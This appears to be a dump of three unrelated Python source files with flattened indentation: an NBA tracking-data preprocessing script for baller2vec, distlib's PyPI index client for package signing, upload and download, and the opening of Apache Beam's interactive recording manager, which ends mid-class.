def get_event_streams_worker(game_names, queue):
gameid2event_stream = {}
for (game_idx, game_name) in enumerate(game_names):
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
gameid2event_stream[gameid] = get_event_stream(gameid)
except IndexError:
continue
queue.put(gameid2event_stream)
def get_event_streams():
q = multiprocessing.Queue()
dir_fs = os.listdir(TRACKING_DIR)
all_game_names = [dir_f for dir_f in dir_fs if not dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_names_per_process = int(np.ceil(len(all_game_names) / processes))
jobs = []
for i in range(processes):
start = i * game_names_per_process
end = start + game_names_per_process
game_names = all_game_names[start:end]
p = multiprocessing.Process(
target=get_event_streams_worker, args=(game_names, q)
)
jobs.append(p)
p.start()
gameid2event_stream = {}
for _ in jobs:
gameid2event_stream.update(q.get())
for p in jobs:
p.join()
event2event_idx = {}
for event_stream in gameid2event_stream.values():
for event in event_stream:
event2event_idx.setdefault(event["event"], len(event2event_idx))
return (event2event_idx, gameid2event_stream)
def add_score_changes(X):
score_diff_idx = 6
period_idx = 3
wall_clock_idx = -1
score_change_idxs = np.where(np.diff(X[:, score_diff_idx]) != 0)[0] + 1
score_changes = (
X[score_change_idxs, score_diff_idx] - X[score_change_idxs - 1, score_diff_idx]
)
# Score changes at the half are the result of the teams changing sides.
half_idx = -1
if (X[:, period_idx].min() <= 2) and (X[:, period_idx].max() >= 3):
period_change_idxs = np.where(np.diff(X[:, 3]) != 0)[0] + 1
for period_change_idx in period_change_idxs:
before_period = X[period_change_idx - 1, period_idx]
after_period = X[period_change_idx, period_idx]
if (before_period <= 2) and (after_period > 2):
half_idx = period_change_idx
break
else:
half_idx = -1
cur_score_change_idx = 0
times_to_next_score_change = []
next_score_changes = []
end_time = X[-1, wall_clock_idx]
for (idx, row) in enumerate(X):
try:
if idx == score_change_idxs[cur_score_change_idx]:
cur_score_change_idx += 1
score_change_idx = score_change_idxs[cur_score_change_idx]
next_score_time = X[score_change_idx, wall_clock_idx]
if score_change_idx == half_idx:
next_score_change = 0
else:
next_score_change = score_changes[cur_score_change_idx]
except IndexError:
next_score_time = end_time
next_score_change = 0
cur_time = X[idx, wall_clock_idx]
time_to_next_score_change = (next_score_time - cur_time) / 1000
times_to_next_score_change.append(time_to_next_score_change)
next_score_changes.append(next_score_change)
times_to_next_score_change = np.array(times_to_next_score_change)[None].T
next_score_changes = np.array(next_score_changes)[None].T
X = np.hstack(
[
X[:, :wall_clock_idx],
times_to_next_score_change,
next_score_changes,
X[:, wall_clock_idx:],
]
)
return X
def save_game_numpy_arrays(game_name):
try:
gameid = os.listdir(f"{TRACKING_DIR}/{game_name}")[0].split(".")[0]
except IndexError:
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
return
if gameid not in gameid2event_stream:
print(f"Missing gameid: {gameid}", flush=True)
return
df_tracking = pd.read_json(f"{TRACKING_DIR}/{game_name}/{gameid}.json")
home_team = None
cur_time = -1
event_idx = 0
game_over = False
X = []
y = []
event_stream = gameid2event_stream[gameid]
for tracking_event in df_tracking["events"]:
event_id = tracking_event["eventId"]
if home_team is None:
home_team_id = tracking_event["home"]["teamid"]
home_team = TEAM_ID2PROPS[home_team_id]["abbreviation"]
moments = tracking_event["moments"]
for moment in moments:
period = moment[0]
# Milliseconds.
wall_clock = moment[1]
game_clock = moment[2]
shot_clock = moment[3]
shot_clock = shot_clock if shot_clock else game_clock
period_time = 720 - game_clock if period <= 4 else 300 - game_clock
game_time = get_game_time(game_clock, period)
# Moments can overlap temporally, so previously processed time points are
# skipped along with clock stoppages.
if game_time <= cur_time:
continue
while game_time > event_stream[event_idx]["game_time"]:
event_idx += 1
if event_idx >= len(event_stream):
game_over = True
break
if game_over:
break
event = event_stream[event_idx]
score = event["score"]
(away_score, home_score) = (int(s) for s in score.split(" - "))
home_hoop_side = hoop_sides[gameid][period][home_team]
if home_hoop_side == 0:
(left_score, right_score) = (home_score, away_score)
else:
(right_score, left_score) = (home_score, away_score)
(ball_x, ball_y, ball_z) = moment[5][0][2:5]
data = [
game_time,
period_time,
shot_clock,
period,
left_score, # off_score,
right_score, # def_score,
left_score - right_score,
ball_x,
ball_y,
ball_z,
]
if len(moment[5][1:]) != 10:
continue
player_idxs = []
player_xs = []
player_ys = []
player_hoop_sides = []
try:
for player in moment[5][1:]:
player_idxs.append(playerid2player_idx[player[1]])
player_xs.append(player[2])
player_ys.append(player[3])
hoop_side = hoop_sides[gameid][period][
TEAM_ID2PROPS[player[0]]["abbreviation"]
]
player_hoop_sides.append(int(hoop_side == COURT_LENGTH))
except KeyError:
if player[1] == 0:
print(
f"Bad player in event {event_id} for {game_name}.", flush=True
)
continue
else:
raise KeyError
order = np.argsort(player_idxs)
for idx in order:
data.append(player_idxs[idx])
for idx in order:
data.append(player_xs[idx])
for idx in order:
data.append(player_ys[idx])
for idx in order:
data.append(player_hoop_sides[idx])
data.append(event_idx)
data.append(wall_clock)
if len(data) != 52:
raise ValueError
X.append(np.array(data))
y.append(event2event_idx.setdefault(event["event"], len(event2event_idx)))
cur_time = game_time
if game_over:
break
X = np.stack(X)
y = np.array(y)
X = add_score_changes(X)
np.save(f"{GAMES_DIR}/{gameid}_X.npy", X)
np.save(f"{GAMES_DIR}/{gameid}_y.npy", y)
def save_numpy_arrays_worker(game_names):
for game_name in game_names:
try:
save_game_numpy_arrays(game_name)
except ValueError:
pass
shutil.rmtree(f"{TRACKING_DIR}/{game_name}")
def save_numpy_arrays():
dir_fs = os.listdir(TRACKING_DIR)
all_game_names = [dir_f for dir_f in dir_fs if not dir_f.endswith(".7z")]
processes = multiprocessing.cpu_count()
game_names_per_process = int(np.ceil(len(all_game_names) / processes))
jobs = []
for i in range(processes):
start = i * game_names_per_process
end = start + game_names_per_process
game_names = all_game_names[start:end]
p = multiprocessing.Process(target=save_numpy_arrays_worker, args=(game_names,))
jobs.append(p)
p.start()
for p in jobs:
p.join()
def player_idx2playing_time_map_worker(gameids, queue):
player_idx2playing_time = {}
for gameid in gameids:
X = np.load(f"{GAMES_DIR}/{gameid}_X.npy")
wall_clock_diffs = np.diff(X[:, -1]) / 1000
all_player_idxs = X[:, 10:20].astype(int)
prev_players = set(all_player_idxs[0])
for (row_idx, player_idxs) in enumerate(all_player_idxs[1:]):
current_players = set(player_idxs)
if len(prev_players & current_players) == 10:
wall_clock_diff = wall_clock_diffs[row_idx]
if wall_clock_diff < THRESHOLD:
for player_idx in current_players:
player_idx2playing_time[player_idx] = (
player_idx2playing_time.get(player_idx, 0) + wall_clock_diff
)
prev_players = current_players
queue.put(player_idx2playing_time)
def get_player_idx2playing_time_map():
q = multiprocessing.Queue()
all_gameids = list(set([np_f.split("_")[0] for np_f in os.listdir(GAMES_DIR)]))
processes = multiprocessing.cpu_count()
gameids_per_process = int(np.ceil(len(all_gameids) / processes))
jobs = []
for i in range(processes):
start = i * gameids_per_process
end = start + gameids_per_process
gameids = all_gameids[start:end]
p = multiprocessing.Process(
target=player_idx2playing_time_map_worker, args=(gameids, q)
)
jobs.append(p)
p.start()
player_idx2playing_time = {}
for _ in jobs:
game_player_idx2_playing_time = q.get()
for (player_idx, playing_time) in game_player_idx2_playing_time.items():
player_idx2playing_time[player_idx] = (
player_idx2playing_time.get(player_idx, 0) + playing_time
)
for p in jobs:
p.join()
playing_times = list(player_idx2playing_time.values())
print(np.quantile(playing_times, [0.1, 0.2, 0.25, 0.5, 0.75, 0.8, 0.9]))
# [ 3364.6814 10270.2988 13314.768 39917.09399999
# 59131.73249999 63400.76839999 72048.72879999]
return player_idx2playing_time
if __name__ == "__main__":
os.makedirs(GAMES_DIR, exist_ok=True)
(playerid2player_idx, player_idx2props) = get_playerid2player_idx_map()
try:
baller2vec_config = pickle.load(
open(f"{DATA_DIR}/baller2vec_config.pydict", "rb")
)
player_idx2props = baller2vec_config["player_idx2props"]
event2event_idx = baller2vec_config["event2event_idx"]
playerid2player_idx = {}
for (player_idx, props) in player_idx2props.items():
playerid2player_idx[props["playerid"]] = player_idx
except FileNotFoundError:
baller2vec_config = False
shot_times = get_shot_times()
hoop_sides = get_team_hoop_sides()
(event2event_idx, gameid2event_stream) = get_event_streams()
if baller2vec_config:
event2event_idx = baller2vec_config["event2event_idx"]
save_numpy_arrays()
player_idx2playing_time = get_player_idx2playing_time_map()
for (player_idx, playing_time) in player_idx2playing_time.items():
player_idx2props[player_idx]["playing_time"] = playing_time
if not baller2vec_config:
baller2vec_config = {
"player_idx2props": player_idx2props,
"event2event_idx": event2event_idx,
}
pickle.dump(
baller2vec_config, open(f"{DATA_DIR}/baller2vec_config.pydict", "wb")
)
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server_flask.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
recording_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import threading
import time
import warnings
import pandas as pd
import apache_beam as beam
from apache_beam.dataframe.convert import to_pcollection
from apache_beam.dataframe.frame_base import DeferredBase
from apache_beam.portability.api.beam_runner_api_pb2 import TestStreamPayload
from apache_beam.runners.interactive import background_caching_job as bcj
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive import interactive_runner as ir
from apache_beam.runners.interactive import pipeline_fragment as pf
from apache_beam.runners.interactive import pipeline_instrument as pi
from apache_beam.runners.interactive import utils
from apache_beam.runners.runner import PipelineState
_LOGGER = logging.getLogger(__name__)
class ElementStream:
"""A stream of elements from a given PCollection."""
def __init__(
self,
pcoll, # type: beam.pvalue.PCollection
var, # type: str
cache_key, # type: str
max_n, # type: int
max_duration_secs # type: float
):
self._pcoll = pcoll
self._cache_key = cache_key
self._pipeline = pcoll.pipeline
self._var = var
self._n = max_n
self._duration_secs = max_duration_secs
# A small state variable that when True, indicates that no more new elements
# will be yielded if read() is called again.
self._done = False
@property
def var(self):
# type: () -> str
"""Returns the variable named that defined this PCollection."""
return self._var
@property
def cache_key(self):
# type: () -> str
"""Returns the cache key for this stream."""
return self._cache_key
def display_id(self, suffix):
# type: (str) -> str
"""Returns a unique id able to be displayed in a web browser."""
return utils.obfuscate(self._cache_key, suffix)
def is_computed(self):
# type: () -> boolean
"""Returns True if no more elements will be recorded."""
return self._pcoll in ie.current_env().computed_pcollections
def is_done(self):
# type: () -> boolean
"""Returns True if no more new elements will be yielded."""
return self._done
def read(self, tail=True):
# type: (boolean) -> Any
"""Reads the elements currently recorded."""
# Get the cache manager and wait until the file exists.
cache_manager = ie.current_env().get_cache_manager(self._pipeline)
# Retrieve the coder for the particular PCollection which will be used to
# decode elements read from cache.
coder = cache_manager.load_pcoder('full', self._cache_key)
# Read the elements from the cache.
# Import limiters here to prevent a circular import.
from apache_beam.runners.interactive.options.capture_limiters import CountLimiter
from apache_beam.runners.interactive.options.capture_limiters import ProcessingTimeLimiter
reader, _ = cache_manager.read('full', self._cache_key, tail=tail)
# Because a single TestStreamFileRecord can yield multiple elements, we
# limit the count again here in the to_element_list call.
#
# There are two ways of exiting this loop either a limiter was triggered or
# all elements from the cache were read. In the latter situation, it may be
# the case that the pipeline was still running. Thus, another invocation of
# `read` will yield new elements.
count_limiter = CountLimiter(self._n)
time_limiter = ProcessingTimeLimiter(self._duration_secs)
limiters = (count_limiter, time_limiter)
for e in utils.to_element_list(reader,
coder,
include_window_info=True,
n=self._n,
include_time_events=True):
# From the to_element_list we either get TestStreamPayload.Events if
# include_time_events or decoded elements from the reader. Make sure we
# only count the decoded elements to break early.
if isinstance(e, TestStreamPayload.Event):
time_limiter.update(e)
else:
count_limiter.update(e)
yield e
if any(l.is_triggered() for l in limiters):
break
# A limiter being triggered means that we have fulfilled the user's request.
# This implies that reading from the cache again won't yield any new
# elements. WLOG, this applies to the user pipeline being terminated.
if any(l.is_triggered()
for l in limiters) or ie.current_env().is_terminated(self._pipeline):
self._done = True
class Recording:
"""A group of PCollections from a given pipeline run."""
def __init__(
self,
user_pipeline, # type: beam.Pipeline
pcolls, # type: List[beam.pvalue.PCollection]
result, # type: beam.runner.PipelineResult
pipeline_instrument, # type: beam.runners.interactive.PipelineInstrument
max_n, # type: int
max_duration_secs, # type: float
):
self._user_pipeline = user_pipeline
self._result = result
self._result_lock = threading.Lock()
self._pcolls = pcolls
pcoll_var = lambda pcoll: pipeline_instrument.cacheable_var_by_pcoll_id(
pipeline_instrument.pcolls_to_pcoll_id.get(str(pcoll), None))
self._streams = {
pcoll: ElementStream(
pcoll,
pcoll_var(pcoll),
pipeline_instrument.cache_key(pcoll),
max_n,
max_duration_secs)
for pcoll in pcolls
}
self._start = time.time()
self._duration_secs = max_duration_secs
self._set_computed = bcj.is_cache_complete(str(id(user_pipeline)))
# Run a separate thread for marking the PCollections done. This is because
# the pipeline run may be asynchronous.
self._mark_computed = threading.Thread(target=self._mark_all_computed)
self._mark_computed.daemon = True
self._mark_computed.start()
def _mark_all_computed(self):
# type: () -> None
"""Marks all the PCollections upon a successful pipeline run."""
if not self._result:
return
while not PipelineState.is_terminal(self._result.state):
with self._result_lock:
bcj = ie.current_env().get_background_caching_job(self._user_pipeline)
if bcj and bcj.is_done():
self._result.wait_until_finish()
elif time.time() - self._start >= self._duration_secs:
self._result.cancel()
self._result.wait_until_finish()
elif all(s.is_done() for s in self._streams.values()):
self._result.cancel()
self._result.wait_until_finish()
time.sleep(0.1)
# Mark the PCollection as computed so that Interactive Beam wouldn't need to
# re-compute.
if self._result.state is PipelineState.DONE and self._set_computed:
ie.current_env().mark_pcollection_computed(self._pcolls)
def is_computed(self):
# type: () -> boolean
"""Returns True if all PCollections are computed."""
return all(s.is_computed() for s in self._streams.values())
def stream(self, pcoll):
# type: (beam.pvalue.PCollection) -> ElementStream
"""Returns an ElementStream for a given PCollection."""
return self._streams[pcoll]
def computed(self):
# type: () -> None
"""Returns all computed ElementStreams."""
return {p: s for p, s in self._streams.items() if s.is_computed()}
def uncomputed(self):
# type: () -> None
"""Returns all uncomputed ElementStreams."""
return {p: s for p, s in self._streams.items() if not s.is_computed()}
def cancel(self):
# type: () -> None
"""Cancels the recording."""
with self._result_lock:
self._result.cancel()
def wait_until_finish(self):
# type: () -> None
"""Waits until the pipeline is done and returns the final state.
This also marks any PCollections as computed right away if the pipeline is
successful.
"""
if not self._result:
return beam.runners.runner.PipelineState.DONE
self._mark_computed.join()
return self._result.state
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self._user_pipeline)
size = sum(
cache_manager.size('full', s.cache_key) for s in self._streams.values())
return {'size': size, 'duration': self._duration_secs}
class RecordingManager:
"""Manages recordings of PCollections for a given pipeline."""
def __init__(self, user_pipeline, pipeline_var=None, test_limiters=None):
# type: (beam.Pipeline, str, list[Limiter]) -> None
self.user_pipeline = user_pipeline # type: beam.Pipeline
self.pipeline_var = pipeline_var if pipeline_var else '' # type: str
self._recordings = set() # type: set[Recording]
self._start_time_sec = 0 # type: float
self._test_limiters = test_limiters if test_limiters else []
def _watch(self, pcolls):
# type: (List[beam.pvalue.PCollection]) -> None
"""Watch any pcollections not being watched.
This allows for the underlying caching layer to identify the PCollection as
something to be cached.
"""
watched_pcollections = set()
watched_dataframes = set()
for watching in ie.current_env().watching():
for _, val in watching:
if isinstance(val, beam.pvalue.PCollection):
watched_pcollections.add(val)
elif isinstance(val, DeferredBase):
watched_dataframes.add(val)
# Convert them one-by-one to generate a unique label for each. This allows
# caching at a more fine-grained granularity.
#
# TODO(BEAM-12388): investigate the mixing pcollections in multiple
# pipelines error when using the default label.
for df in watched_dataframes:
pcoll = to_pcollection(df, yield_elements='pandas', label=str(df._expr))
watched_pcollections.add(pcoll)
for pcoll in pcolls:
if pcoll not in watched_pcollections:
ie.current_env().watch(
{'anonymous_pcollection_{}'.format(id(pcoll)): pcoll})
def _clear(self, pipeline_instrument):
# type: (List[beam.pvalue.PCollection]) -> None
"""Clears the recording of all non-source PCollections."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
# Only clear the PCollections that aren't being populated from the
# BackgroundCachingJob.
computed = ie.current_env().computed_pcollections
cacheables = [
c for c in pipeline_instrument.cacheables.values()
if c.pcoll.pipeline is self.user_pipeline and c.pcoll not in computed
]
all_cached = set(str(c.to_key()) for c in cacheables)
source_pcolls = getattr(cache_manager, 'capture_keys', set())
to_clear = all_cached - source_pcolls
self._clear_pcolls(cache_manager, set(to_clear))
def _clear_pcolls(self, cache_manager, pcolls):
for pc in pcolls:
cache_manager.clear('full', pc)
def clear(self):
# type: () -> None
"""Clears all cached PCollections for this RecordingManager."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
if cache_manager:
cache_manager.cleanup()
def cancel(self):
# type: (None) -> None
"""Cancels the current background recording job."""
bcj.attempt_to_cancel_background_caching_job(self.user_pipeline)
for r in self._recordings:
r.wait_until_finish()
self._recordings = set()
# The recordings rely on a reference to the BCJ to correctly finish. So we
# evict the BCJ after they complete.
ie.current_env().evict_background_caching_job(self.user_pipeline)
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
